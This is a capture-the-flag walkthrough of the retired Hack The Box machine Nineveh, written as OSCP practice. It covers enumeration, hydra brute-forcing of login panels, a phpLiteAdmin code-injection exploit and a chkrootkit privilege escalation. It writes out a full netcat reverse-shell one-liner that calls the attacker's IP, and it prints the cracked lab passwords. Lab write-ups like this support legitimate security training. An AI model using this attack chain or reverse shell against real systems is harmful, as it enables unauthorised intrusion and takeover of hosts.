OSCP PREPROTİONS – HTB Nineveh

Nineveh machine is a vulnerable machine with Linux operating system among retired machines. It is expected to obtain user and root flags using this vulnerability.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full port scan

As a result of network scanning, 80/tcp http Apache httpd, 443/tcp ssl/http Apache httpd ports are open.
We continue via brwoser to enumerate these ports.
80.port

A Gobuster scan detected the /department directory.

We tried default passwords to redirect us to the login page, we tried parameters in case of sql injetin, we did not get any results.
Here, when we type the username muhammed, it says the username is wrong, when we enter the admin user, it says the password is wrong. Therefore, we will try brute force with hydra.

Our brute force attack was successful
login: admin password: 1q2w3e4r5t
credential information.

We were able to log in successfully. We could not get much significant information here. We could only see get requests on the url side in the Notes section. Let’s dot this part and continue on port 443.

443.port

We looked at the source code and since we couldn’t get any valuable information, we ran a scan with Gobuster.
Gobuster scan

A directory file scan detected the directory/db.

Let’s try a brute force attack with hydra here too

Here, thanks to hydra, we have detected host: 10.10.10.10.43 password: password123 credential information.
Let’s log in with this information.

This way we can log in to the phpLiteAdmin v1.9 panel. Let’s see if there is a vulnerability in this panel version via searchsploit.

We were able to see the vulnerability of this panel.

Thanks to this vulnerability, an attacker can create a php-based database and abuse it.
Let’s apply the steps here in order
1- A db named hack.php is created.
2- A special table is created in this db and a command to be added is added, we will add the command.
3- We run the hack.php file
While performing these steps we can run our command.

Here is the final version

To make a request to it now, let’s communicate via http, that is, through the dahsbosrd directory on port 80
It didn’t work because we wrote it as nineveh.php here.
Let’s see if our php code will work by using the name of ninevehNotes.txt as default.

As you can see, we have provided command injection here.

Now let’s give ourselves a revershell
We ran the Ls command.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4747 >/tmp/f
We send the command through the burp suite
listening with nc in the background

This is how we got our shelter

We didn’t get user flag and root flag, so we provide local enumeration.

/var/www/ssl/secure_notes/nineveh.png
We were able to see the ssh key.
We cannot pull and connect it to our machine with scp, so we will transfer files with nc

We saved our ssl key, tried to connect and couldn’t connect via ssh. We didn’t find anything in the nmap scan that ssh was open.

So let’s continue with local enumeration

Here we understand that something is happening on ports 571 290 911. We can think that there is a secret passage here to close the services to the outside, that is, Port Knocking management has been applied, we can think that the ssh port will be opened when knocking on the ports specified here. One way to confirm this is to detect knockd files.

As we can see here, as it is understood in the mail, it is understood to write the command that opens the ssh port if a 5 millisecond scan is provided to ports 571, 290, 911 respectively.

Therefore, we will scan using the knock tool.

Here we have seen that the ssh port is opened.
Now let’s connect using the ssh key.

As you can see, we provided our ssh connection and we were able to get our user flag.
Since we do not have root authorization here, we cannot access root.

Therefore we provide local enumeration.

At the end of the Linpeas scan, we say that we can raise local authorization from the /usr/sbin/report-reset.sh file.

Here is a crontab that deletes the txt files in the /report directory. It is important who is running this crontab. If there is a process running here with root privileges, we will try to exploit it.
To see the details of the processes running behind, we upload the pspy tool to the target machine and scan it.

Too many chkrootkit files catch our eye, let’s see if there are exploits related to this in searchspoloite

We have seen that we can do local privilege escalation related to Chkrootkit. To use this exploit, we need to do it in order;
We create a file named update in the /tmp directory as a non-root user.
Then we write a bash script that will give us Shell in this update file

This way we got our shell
And we’ve lede our root flag